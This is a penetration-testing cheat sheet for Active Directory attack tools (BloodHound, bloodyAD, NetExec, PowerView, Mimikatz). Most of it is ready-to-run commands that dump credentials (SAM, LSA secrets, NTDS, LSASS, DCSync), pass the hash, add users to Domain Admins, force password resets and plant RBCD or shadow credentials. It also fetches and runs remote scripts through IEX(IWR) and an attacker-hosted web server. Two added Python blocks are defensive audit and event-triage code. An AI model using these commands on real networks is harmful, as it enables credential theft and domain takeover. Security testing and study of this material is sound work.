
# AD Enumeration Tools

## Table of Contents

- [BloodHound & SharpHound](#bloodhound--sharphound)
- [bloodyAD](#bloodyad)
- [adPEAS](#adpeas)
- [NetExec (nxc)](#netexec-nxc)
- [Invoke-ADEnum](#invoke-adenum)
- [ADRecon](#adrecon)
- [Quick Reference](#quick-reference)
- [PowerView (PowerSploit)](#powerview-powersploit)
- [Mimikatz](#mimikatz)
- [See Also](#see-also)

## BloodHound & SharpHound

### Quick Check (One-liner)

```bash
# Kali: Start BloodHound and collect data
sudo bloodhound &
# On target Windows: Run SharpHound
powershell -ep bypass -c "Import-Module .\SharpHound.ps1; Invoke-BloodHound -CollectionMethod All"
```

https://bloodhound.specterops.io/

BloodHound is an AD visualization and attack path finder. SharpHound is the data collector.

### Kali Linux Paths

```text
# SharpHound location
/usr/share/sharphound
├── SharpHound.exe
├── SharpHound.exe.config
├── SharpHound.pdb
└── SharpHound.ps1

# PowerSploit/PowerView location
/usr/share/windows-resources/powersploit
└── Recon/PowerView.ps1

# Mimikatz location
/usr/share/windows-resources/mimikatz
├── Win32/mimikatz.exe
└── x64/mimikatz.exe

# PEASS (linpeas/winpeas)
/usr/share/peass/linpeas
/usr/share/peass/winpeas
```

### Installation (Kali)

```bash
# Install BloodHound Community Edition
sudo apt update && sudo apt install -y bloodhound

# Setup BloodHound (first time only)
sudo bloodhound-setup

# Start BloodHound
sudo bloodhound
```

⚠️ **PostgreSQL Collation Fix** (if setup fails):

```bash
# Start PostgreSQL
sudo systemctl start postgresql
sudo systemctl enable postgresql

# Fix collation version
sudo runuser -u postgres -- psql -c 'ALTER DATABASE postgres REFRESH COLLATION VERSION;'
sudo runuser -u postgres -- psql -c 'ALTER DATABASE template1 REFRESH COLLATION VERSION;'

# Retry setup
sudo bloodhound-setup
```

### SharpHound Data Collection

#### Copy SharpHound to target

```bash
# From Kali: serve the script from the directory it was copied to (port 80 needs root)
cp /usr/share/sharphound/SharpHound.ps1 ~/Desktop/
cd ~/Desktop && sudo python3 -m http.server 80
```

#### On Target Windows (PowerShell)

```powershell
# Download and import
iwr -Uri "http://KALI_IP/SharpHound.ps1" -OutFile SharpHound.ps1
powershell -ep bypass

# Import module
. .\SharpHound.ps1

# Collect all data
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp\

# Alternative: Use EXE directly
.\SharpHound.exe -c All --outputdirectory C:\Temp\
```

### Collection Methods

| Method | Description |
|---|---|
| All | All collection methods |
| Default | Group, LocalAdmin, Session, Trusts |
| DCOnly | Only from Domain Controllers |
| Group | Group memberships |
| LocalAdmin | Local admin rights |
| Session | Session data |
| LoggedOn | Logged on users |
| Trusts | Domain trusts |
| ACL | ACL data |

### Import Data to BloodHound

1. Transfer the ZIP from the target to Kali.
2. In the BloodHound GUI: Upload Data → Select ZIP file.

### Useful Queries

Pre-built queries in BloodHound:

| Query | Description |
|---|---|
| Find all Domain Admins | List all DA users |
| Shortest Path to DA | Find attack path |
| Kerberoastable Accounts | Users with SPNs |
| AS-REP Roastable Users | No pre-auth required |
| Unconstrained Delegation | Dangerous machines |

### Custom Cypher Queries

```cypher
// Find all Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u.name, u.serviceprincipalnames

// Find computers with unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c.name

// Shortest path from owned to DA
MATCH p=shortestPath((n {owned:true})-[*1..]->(g:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'})) RETURN p
```
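The same three checks can be run offline against the raw collector output, which is handy for auditing a SharpHound ZIP without loading it into the GUI. This is an added Python example, not code from the cheat sheet or the BloodHound project; it assumes the SharpHound users.json / computers.json layout ("data" list of objects with a "Properties" map), uses constructed sample records, and additionally skips disabled accounts.

```python
import json

# Constructed sample in the shape of a SharpHound users.json / computers.json
# export (assumption: the "data" -> "Properties" layout; every value is made up).
SAMPLE_USERS = json.dumps({"meta": {"type": "users", "count": 3}, "data": [
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1105", "Properties": {
        "name": "SVC_SQL@DOMAIN.LOCAL", "enabled": True, "hasspn": True,
        "serviceprincipalnames": ["MSSQLSvc/sql01.domain.local:1433"],
        "dontreqpreauth": False}},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1106", "Properties": {
        "name": "LEGACY.APP@DOMAIN.LOCAL", "enabled": True, "hasspn": False,
        "serviceprincipalnames": [], "dontreqpreauth": True}},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1107", "Properties": {
        "name": "JDOE@DOMAIN.LOCAL", "enabled": False, "hasspn": True,
        "serviceprincipalnames": ["HTTP/old.domain.local"], "dontreqpreauth": False}},
]})
SAMPLE_COMPUTERS = json.dumps({"meta": {"type": "computers", "count": 2}, "data": [
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1000", "Properties": {
        "name": "DC01.DOMAIN.LOCAL", "unconstraineddelegation": True}},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1201", "Properties": {
        "name": "FS01.DOMAIN.LOCAL", "unconstraineddelegation": True}},
]})

def audit(users_json, computers_json):
    """Return the findings the three Cypher queries surface: Kerberoastable
    users (hasspn), AS-REP roastable users (dontreqpreauth) and computers
    trusted for unconstrained delegation, skipping disabled accounts."""
    findings = {"kerberoastable": [], "asrep_roastable": [], "unconstrained": []}
    for obj in json.loads(users_json)["data"]:
        p = obj["Properties"]
        if not p.get("enabled", True):
            continue  # a disabled account cannot be roasted either way
        if p.get("hasspn"):
            findings["kerberoastable"].append(
                (p["name"], tuple(p.get("serviceprincipalnames", []))))
        if p.get("dontreqpreauth"):
            findings["asrep_roastable"].append(p["name"])
    for obj in json.loads(computers_json)["data"]:
        p = obj["Properties"]
        # Domain controllers are expected here; any other host is a finding to fix.
        if p.get("unconstraineddelegation"):
            findings["unconstrained"].append(p["name"])
    return findings

if __name__ == "__main__":
    for kind, hits in audit(SAMPLE_USERS, SAMPLE_COMPUTERS).items():
        print(f"{kind}: {hits}")
```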

## bloodyAD

### bloodyAD One-liner

```bash
# Quick AD enumeration with multiple tools
bloodyAD -u $user -p $pass -d $domain --host $rhost get writable && nxc smb $rhost -u $user -p $pass --users
```

https://github.com/CravateRouge/bloodyAD

bloodyAD is a powerful Active Directory privilege escalation framework.

### Installation

```bash
pip install bloodyAD
# or
git clone https://github.com/CravateRouge/bloodyAD
cd bloodyAD && pip install .
```

### Basic Usage

```bash
# With password
bloodyAD -u $username -p '$password' -d $domain --host $rhost <command>

# With NTLM hash
bloodyAD -u $username -p ':$nthash' -d $domain --host $rhost <command>

# With Kerberos
export KRB5CCNAME=ticket.ccache
bloodyAD -u $username -d $domain --host $rhost -k <command>
```

### Enumeration

```bash
# Get domain info
bloodyAD -u $username -p '$password' -d $domain --host $rhost get info

# Get all users
bloodyAD -u $username -p '$password' -d $domain --host $rhost get users

# Get all computers
bloodyAD -u $username -p '$password' -d $domain --host $rhost get computers

# Get object attributes
bloodyAD -u $username -p '$password' -d $domain --host $rhost getObjectAttributes $target_user

# Get writable objects
bloodyAD -u $username -p '$password' -d $domain --host $rhost getObjectsInOU "DC=domain,DC=local" --writableOnly
```

### ACL Abuse

```bash
# Add user to group
bloodyAD -u $username -p '$password' -d $domain --host $rhost add groupMember "Domain Admins" $target_user

# Force password change (ForceChangePassword)
bloodyAD -u $username -p '$password' -d $domain --host $rhost set password $target_user 'NewPassword123!'

# Write owner
bloodyAD -u $username -p '$password' -d $domain --host $rhost set owner $target_object $username

# Add GenericAll
bloodyAD -u $username -p '$password' -d $domain --host $rhost add genericAll $target_object $username
```

### RBCD Attack

```bash
# Add RBCD
bloodyAD -u $username -p '$password' -d $domain --host $rhost add rbcd '$target_computer$' '$controlled_computer$'

# Remove RBCD
bloodyAD -u $username -p '$password' -d $domain --host $rhost del rbcd '$target_computer$' '$controlled_computer$'
```

### Shadow Credentials

```bash
# Add Shadow Credential
bloodyAD -u $username -p '$password' -d $domain --host $rhost add shadowCredentials $target

# Remove Shadow Credential
bloodyAD -u $username -p '$password' -d $domain --host $rhost del shadowCredentials $target
```

### Computer Account

```bash
# Add computer account
bloodyAD -u $username -p '$password' -d $domain --host $rhost add computer 'YOURPC$' 'Password123!'

# Get machine account quota
bloodyAD -u $username -p '$password' -d $domain --host $rhost getMAQ
```
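Each of the ACL Abuse, RBCD, Shadow Credentials and Computer Account commands above is a directory write that the domain controller logs as a specific Windows Security event, which is what a defender watches for. This added Python example (not part of the cheat sheet or of bloodyAD) triages constructed sample events for those patterns; the field names follow the Security log's event data, and the records themselves are made up.

```python
# Windows Security event IDs the bloodyAD commands above generate on the DC:
#   4728 / 4756  member added to a global / universal security group
#   4724         attempt to reset an account's password
#   5136         directory object modified (needs "Audit Directory Service
#                Changes" plus a SACL on the object; %%14674 = Value Added)
#   4741         computer account created
WATCHED_ATTRIBUTES = {
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "RBCD configured",
    "msDS-KeyCredentialLink": "shadow credential (key credential) written",
    "nTSecurityDescriptor": "ACL or owner changed",
}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed sample records, one per event, flattened the way a SIEM exports them.
SAMPLE_EVENTS = [
    {"EventID": 4728, "SubjectUserName": "jdoe", "TargetUserName": "Domain Admins",
     "MemberName": "CN=svc_backup,CN=Users,DC=domain,DC=local"},
    {"EventID": 4724, "SubjectUserName": "jdoe", "TargetUserName": "victim"},
    {"EventID": 5136, "SubjectUserName": "jdoe", "OperationType": "%%14674",
     "ObjectDN": "CN=FS01,CN=Computers,DC=domain,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"EventID": 5136, "SubjectUserName": "jdoe", "OperationType": "%%14674",
     "ObjectDN": "CN=victim,CN=Users,DC=domain,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"},
    {"EventID": 5136, "SubjectUserName": "svc_sccm", "OperationType": "%%14674",
     "ObjectDN": "CN=WS22,CN=Computers,DC=domain,DC=local",
     "AttributeLDAPDisplayName": "description"},  # routine edit, must not alert
    {"EventID": 4741, "SubjectUserName": "jdoe", "TargetUserName": "YOURPC$"},
]

def triage(events):
    """Group matching events by the account that made the change; one subject
    with several of these entries in a short window is the pattern to page on."""
    alerts = {}
    for e in events:
        eid, actor = e["EventID"], e["SubjectUserName"]
        if eid in (4728, 4756) and e["TargetUserName"] in PRIVILEGED_GROUPS:
            msg = f"added {e['MemberName']} to {e['TargetUserName']}"
        elif eid == 4724:
            msg = f"reset password of {e['TargetUserName']}"
        elif eid == 5136 and e["AttributeLDAPDisplayName"] in WATCHED_ATTRIBUTES:
            msg = f"{WATCHED_ATTRIBUTES[e['AttributeLDAPDisplayName']]} on {e['ObjectDN']}"
        elif eid == 4741:
            msg = f"created computer account {e['TargetUserName']}"
        else:
            continue
        alerts.setdefault(actor, []).append(msg)
    return alerts
```

Event 5136 only appears when "Audit Directory Service Changes" is enabled and the objects carry a SACL for the watched attributes, so check that before relying on the RBCD and shadow-credential rows.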

## adPEAS

https://github.com/61106960/adPEAS

PowerShell script for Active Directory enumeration.

### adPEAS Basic Usage

```powershell
# Import module
Import-Module .\adPEAS.ps1

# Run all checks
Invoke-adPEAS

# Output to file
Invoke-adPEAS -OutputPath C:\temp\adpeas_results
```

### Specific Modules

```powershell
# Domain enumeration
Invoke-adPEAS -Module Domain

# User enumeration
Invoke-adPEAS -Module User

# Computer enumeration
Invoke-adPEAS -Module Computer

# Kerberos attacks
Invoke-adPEAS -Module Kerberos

# Delegation issues
Invoke-adPEAS -Module Delegation

# ACL abuse
Invoke-adPEAS -Module ACL

# GPO abuse
Invoke-adPEAS -Module GPO

# Certificate attacks
Invoke-adPEAS -Module Certs
```

## NetExec (nxc)

https://github.com/Pennyw0rth/NetExec

Network service enumeration and execution tool, the maintained continuation of CrackMapExec.

### NetExec Installation

```bash
pip install netexec
# or
pipx install netexec
```

### Authentication

```bash
# Password
nxc smb $rhost -u $username -p '$password'

# NTLM hash
nxc smb $rhost -u $username -H $nthash

# Kerberos
nxc smb $rhost -u $username -p '$password' -k

# Multiple targets
nxc smb $cidr -u $username -p '$password'
```

### SMB Enumeration

```bash
# Enumerate shares
nxc smb $rhost -u $username -p '$password' --shares

# Spider shares
nxc smb $rhost -u $username -p '$password' --spider C$ --depth 2

# User enumeration
nxc smb $rhost -u $username -p '$password' --users

# Get password policy
nxc smb $rhost -u $username -p '$password' --pass-pol
```

### LDAP Enumeration

```bash
# General info
nxc ldap $rhost -u $username -p '$password'

# ASREPRoast
nxc ldap $rhost -u $username -p '$password' --asreproast output.txt

# Kerberoast
nxc ldap $rhost -u $username -p '$password' --kerberoast output.txt

# Get users with description
nxc ldap $rhost -u $username -p '$password' -M get-desc-users

# Find unconstrained delegation
nxc ldap $rhost -u $username -p '$password' --trusted-for-delegation

# AD CS enumeration
nxc ldap $rhost -u $username -p '$password' -M adcs
```

### Credential Dumping

```bash
# SAM dump
nxc smb $rhost -u $username -p '$password' --sam

# LSA secrets
nxc smb $rhost -u $username -p '$password' --lsa

# NTDS.dit (DCSync)
nxc smb $rhost -u $username -p '$password' --ntds

# LSASS dump
nxc smb $rhost -u $username -p '$password' -M lsassy
nxc smb $rhost -u $username -p '$password' -M nanodump
```

### Modules

```bash
# List modules
nxc smb -L
nxc ldap -L

# Petitpotam
nxc smb $rhost -u $username -p '$password' -M petitpotam

# WebDAV
nxc smb $rhost -u $username -p '$password' -M webdav

# Impersonate
nxc smb $rhost -u $username -p '$password' -M impersonate
```

## Invoke-ADEnum

https://github.com/Leo4j/Invoke-ADEnum

### Invoke-ADEnum Usage

```powershell
# Load the script into memory
IEX(IWR https://raw.githubusercontent.com/Leo4j/Invoke-ADEnum/main/Invoke-ADEnum.ps1 -UseBasicParsing)

# Run enumeration
Invoke-ADEnum

# Specific domain
Invoke-ADEnum -Domain $domain -Server $rhost
```

## ADRecon

https://github.com/adrecon/ADRecon

### ADRecon Usage

```powershell
# Run full recon
.\ADRecon.ps1

# Output to specific folder
.\ADRecon.ps1 -OutputDir C:\temp\adrecon

# Generate Excel report
.\ADRecon.ps1 -GenExcel C:\temp\adrecon

# Specific domain
.\ADRecon.ps1 -DomainController $rhost -Credential (Get-Credential)
```

## Quick Reference

### Tool Selection

| Task | Best Tool |
|---|---|
| Attack path visualization | BloodHound |
| AD data collection | SharpHound |
| Quick enumeration | NetExec |
| ACL abuse | bloodyAD |
| Comprehensive scan | adPEAS |
| Report generation | ADRecon |
| Credential dumping | Mimikatz |
| AD enumeration | PowerView |

### Common Commands

```bash
# NetExec - Quick wins
nxc smb $rhost -u $username -p '$password' --shares --users

# bloodyAD - Password change
bloodyAD -u $user -p $pass -d $domain --host $rhost set password victim 'NewPass123!'

# bloodyAD - Add to group
bloodyAD -u $user -p $pass -d $domain --host $rhost add groupMember "Domain Admins" $victim
```

```powershell
# SharpHound - Collect all data
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp\
```

## PowerView (PowerSploit)

https://github.com/PowerShellMafia/PowerSploit

### Kali Path

```text
/usr/share/windows-resources/powersploit/Recon/PowerView.ps1
```

### PowerView Usage

```powershell
# Import module
powershell -ep bypass
Import-Module .\PowerView.ps1

# Domain enumeration
Get-NetDomain
Get-NetDomainController

# User enumeration
Get-NetUser
Get-NetUser | select cn,pwdlastset,lastlogon
Get-NetUser -SPN  # Kerberoastable users

# Group enumeration
Get-NetGroup | select cn
Get-NetGroup "Domain Admins" | select member
Get-DomainGroupMember "Domain Admins"

# Computer enumeration
Get-NetComputer
Get-DomainComputer | select operatingsystem,name

# Find local admin access
Find-LocalAdminAccess

# Find shares
Find-DomainShare
Find-DomainShare -CheckShareAccess

# Session enumeration
Get-NetSession -ComputerName $hostname
```

## Mimikatz

https://github.com/gentilkiwi/mimikatz

### Mimikatz Kali Path

```text
/usr/share/windows-resources/mimikatz
├── Win32/mimikatz.exe
└── x64/mimikatz.exe
```

### Mimikatz Basic Usage

```text
# Run mimikatz
.\mimikatz.exe

# Enable debug privilege
privilege::debug

# Elevate to SYSTEM
token::elevate
```

### Mimikatz Credential Dumping

```text
# Dump SAM (local accounts)
lsadump::sam

# Dump LSA secrets
lsadump::secrets

# Dump cached credentials
lsadump::cache

# Dump logon passwords (plaintext if available)
sekurlsa::logonpasswords

# Dump NTLM hashes
sekurlsa::msv

# Dump Kerberos tickets
sekurlsa::tickets /export
```

### One-liner Commands

```powershell
# Quick credential dump
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Dump SAM
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

# DCSync attack (requires DA or replication rights)
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:$domain /user:Administrator" "exit"
```

### Pass-the-Hash

```text
# PTH with mimikatz
sekurlsa::pth /user:Administrator /domain:$domain /ntlm:$hash /run:cmd.exe
```

## See Also